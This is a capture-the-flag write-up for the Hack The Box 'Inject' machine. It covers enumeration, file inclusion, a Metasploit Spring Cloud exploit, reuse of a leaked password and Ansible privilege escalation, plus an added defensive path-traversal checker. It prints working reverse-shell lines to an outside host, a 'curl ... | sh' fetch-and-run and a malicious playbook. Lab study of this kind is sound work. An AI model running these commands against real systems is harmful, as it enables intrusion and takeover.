Hack The Box | Inject | Write Up

Just tackled the ‘Inject’ machine on #HackTheBox. Loved the exploration of high ports and the challenge of the injection exploitation! If you’re into #CTF, this is a must try! 🚀 #CyberSecurity #PenTesting #EthicalHacking #InfoSec

The first step is to run our Nmap scan:

└─$ sudo nmap -sT -n -Pn -sV -T4 -vv 10.10.11.204
PORT     STATE SERVICE     REASON  VERSION
22/tcp   open  ssh         syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
8080/tcp open  nagios-nsca syn-ack Nagios NSCA
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We can see some interesting information: port “8080” is open and Nmap fingerprints the service as “Nagios NSCA”. At this point we can look for more information about this service. Let’s open the application in our browser:

We can see it is a kind of application offering a storage service. However, there is more information to find in this application:

In the blog section we can see two possible users, “admin” and “Brandon Auger”. Let’s look at other parts of the application:

We have found an “Upload files” function, which might be a way to get a reverse shell. We can also find another function on this site, the “Sign Up” button:

We can try to enumerate more directories with “ffuf”:

sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.10.11.204:8080/FUZZ -v
[Status: 200, Size: 5371, Words: 1861, Lines: 113, Duration: 90ms]
| URL | http://10.10.11.204:8080/blogs
    * FUZZ: blogs

[Status: 500, Size: 106, Words: 3, Lines: 1, Duration: 432ms]
| URL | http://10.10.11.204:8080/error
    * FUZZ: error

[Status: 500, Size: 712, Words: 27, Lines: 1, Duration: 481ms]
| URL | http://10.10.11.204:8080/environment
    * FUZZ: environment

[Status: 200, Size: 5654, Words: 1053, Lines: 104, Duration: 193ms]
| URL | http://10.10.11.204:8080/register
    * FUZZ: register

[Status: 200, Size: 1857, Words: 513, Lines: 54, Duration: 33ms]
| URL | http://10.10.11.204:8080/upload
    * FUZZ: upload

Apparently we don’t find any more directories. We will try to upload a file through the functionality we discovered and capture the request with Burp Suite:

Let’s try to upload a “jpeg” file. We will see our request in Burp Suite:

Before uploading the “jpeg” file I had tried some other files, but they didn’t work. After forwarding our request we will see the response and finally discover something interesting:

We have found the function that the application uses to show us our uploaded files:

Now we will try to upload a reverse shell, modifying our request in Burp Suite to bypass the restrictions. First, we need to start our listener with netcat:

sudo nc -nlvp 4444

Next, we create a new file with this content:

sh -i >& /dev/tcp/10.10.16.38/4444 0>&1

Now we will try to upload this file, but we will need to modify our request (the file extension) in Burp Suite:

Apparently, it is not working:

If we analyze the URL we can see that it can probably be exploited through file inclusion:

We can see that the application is vulnerable to file inclusion. Let’s check whether we can read the “/etc/passwd” file:
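As an added defensive example (not code from the write-up or from the Inject application), this shows the two halves of the finding above: a path-resolution check that rejects values escaping the upload directory, and that same check run over constructed access-log lines to spot traversal attempts after the fact. The `/show_image` endpoint, the `img` parameter name and the upload root are assumptions, since the write-up does not show the URL.

```python
import os
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Hypothetical upload root and parameter name: the write-up does not show them.
UPLOAD_ROOT = "/var/www/app/uploads"
PARAM = "img"

def resolve_unsafe(img):
    """Naive handler: join the user value onto the root and normalise."""
    return os.path.normpath(os.path.join(UPLOAD_ROOT, img))

def resolve_safe(img):
    """Normalise first, then refuse anything that ends up outside the upload root."""
    candidate = os.path.normpath(os.path.join(UPLOAD_ROOT, img))
    if not candidate.startswith(UPLOAD_ROOT + os.sep):
        raise ValueError("path escapes upload root: %r" % img)
    return candidate

def is_allowed(img):
    try:
        resolve_safe(img)
        return True
    except ValueError:
        return False

# Constructed access-log lines in combined format (not captured from the box).
SAMPLE_LOG = [
    '10.10.16.38 - - [01/Feb/2023:18:40:01 +0000] "GET /show_image?img=cat.jpeg HTTP/1.1" 200 5371',
    '10.10.16.38 - - [01/Feb/2023:18:40:07 +0000] "GET /show_image?img=../../../../etc/passwd HTTP/1.1" 200 1882',
    '10.10.16.38 - - [01/Feb/2023:18:40:12 +0000] "GET /show_image?img=..%252f..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1882',
    '10.10.16.38 - - [01/Feb/2023:18:40:20 +0000] "GET /blogs HTTP/1.1" 200 5371',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def flag_traversal(log_lines):
    """Return (line_no, decoded value) for img values the safe resolver rejects."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        for raw in parse_qs(urlsplit(m.group(1)).query).get(PARAM, []):
            value = unquote(raw)  # parse_qs decoded once; decode again to catch %25xx
            if not is_allowed(value):
                hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in flag_traversal(SAMPLE_LOG):
        print("line %d: traversal via %s=%r" % (n, PARAM, value))
```

The double-decoding step matters: the third sample line would pass a naive `../` string match because the slashes arrive as `%252f`.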

We have discovered the users “frank” and “phil”. We need to enumerate further; let’s see what else we can find. If we keep searching through the different directories we will find the file “pom.xml”:

This file gives us a lot of information, but the interesting part is the technology in use, “org.springframework.cloud”. With this information we can search for an existing exploit for this technology:

└─$ searchsploit spring cloud
---------------------------------------------------------- ----------------------
 Exploit Title                                             |  Path
---------------------------------------------------------- ----------------------
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)    | java/webapps/46772.rb
Spring Cloud Config 2.1.x - Path Traversal (Metasploit)    | java/webapps/46772.rb
Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)   | java/webapps/50799.py
---------------------------------------------------------- ----------------------

However, if we search in Metasploit for the component we have already found, we will see this exploit:

After configuring this exploit, we can exploit the vulnerability:

We will check some information in our Meterpreter session:

meterpreter > sysinfo
Computer     : 10.10.11.204
OS           : Ubuntu 20.04 (Linux 5.4.0-144-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: frank

Now we have access to this machine as the user “frank”. Let’s see if we can spawn a shell to search for more information on this machine:

meterpreter > shell
Process 8848 created.
Channel 1 created.

Now we have a shell. At this point we need to enumerate further to try to gain access to the next user, because we cannot reach it yet. We will find the following file containing the “phil” credentials:

pwd
/home/frank/.m2

ls -la
total 12
drwx------ 2 frank frank 4096 Feb  1 18:38 .
drwxr-xr-x 5 frank frank 4096 Feb  1 18:38 ..
-rw-r----- 1 root  frank  617 Jan 31 16:55 settings.xml

cat settings.xml
<?xml version="1.0" encoding="UTF-8"?>
<settings xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
  <servers>
    <server>
      <id>Inject</id>
      <username>phil</username>
      <password>DocPhillovestoInject123</password>
      <privateKey>${user.home}/.ssh/id_dsa</privateKey>
      <filePermissions>660</filePermissions>
      <directoryPermissions>660</directoryPermissions>
      <configuration></configuration>
    </server>
  </servers>
</settings>

Now, with this new information, we can check whether we can use it to gain access as the user “phil”:

su phil
Password: DocPhillovestoInject123

We will check our user:

id
uid=1001(phil) gid=1001(phil) groups=1001(phil),50(staff)

Go to the user home:

cd /home/phil/

Check the directory:

ls -la
total 24
drwxr-xr-x 3 phil phil 4096 Feb  1 18:38 .
drwxr-xr-x 4 root root 4096 Feb  1 18:38 ..
lrwxrwxrwx 1 root root    9 Feb  1 07:40 .bash_history -> /dev/null
-rw-r--r-- 1 phil phil 3771 Feb 25  2020 .bashrc
drwx------ 2 phil phil 4096 Feb  1 18:38 .cache
-rw-r--r-- 1 phil phil  807 Feb 25  2020 .profile
-rw-r----- 1 root phil   33 Jun  7 04:47 user.txt

Finally, we can check the user flag:

cat user.txt

Now, at this point, we will upgrade our shell with Python:

python3 -c 'import pty; pty.spawn("/bin/bash")'

We need to enumerate further to try to gain root access. We will start a web server on our machine to download linpeas onto the target:

sudo python3 -m http.server 80

After that, we run linpeas on the machine:

curl http://10.10.16.38/linpeas.sh | sh

We have discovered a process running the “/tmp/Vodoy” binary that is not owned by root and does not belong to the current user:

Let’s gather more information about it with the tool “pspy64”:

phil@inject:~$ wget http://10.10.16.38/pspy64
phil@inject:~$ chmod +x pspy64
phil@inject:~$ ./pspy64

We will find a lot of Ansible processes and automation tasks. Let’s see if we can escalate privileges through Ansible:

Let’s try privilege escalation with an Ansible task (https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/ansible-playbook-privilege-escalation/). We need to go to the directory “/opt/automation/tasks/” because that is where we will create the new task. Now we need to prepare our evil task. Create a new file with this content:

- hosts: localhost
  tasks:
    - name: RShell
      command: sudo bash /tmp/root.sh

Now we can download it from our machine:

phil@inject:/opt/automation/tasks$ wget http://10.10.16.38:8080/evil.yml

The next step is to create the file “/tmp/root.sh” containing the reverse shell:

echo '/bin/bash -i >& /dev/tcp/10.10.16.38/4422 0>&1' > /tmp/root.sh

Also, don’t forget to start our netcat listener:

└─$ sudo nc -nlvp 4422

Now we can exploit the vulnerability to gain root access on the machine:

phil@inject:/opt/automation/tasks$ ansible-playbook evil.yml

Now we receive the reverse shell with root permissions:

Now we can reach the root flag:

root@inject:/opt/automation/tasks# cd /root/
cd /root/

root@inject:~# ls
playbook_1.yml
root.txt

root@inject:~# cat root.txt
cat root.txt

That’s it for our deep-dive into ‘Inject,’ a true masterclass in understanding and exploiting vulnerabilities in the world of Hack The Box CTF challenges. As we unpacked the twists and turns of enumeration and injection, we’ve gained vital knowledge and new skills, elevating our cybersecurity expertise. Until the next challenge, keep on hacking, keep on learning, and always explore responsibly. Stay tuned for more journeys into the thrilling world of CTF challenges!

Keep your hacking spirit high and cybersecurity curiosity alive!
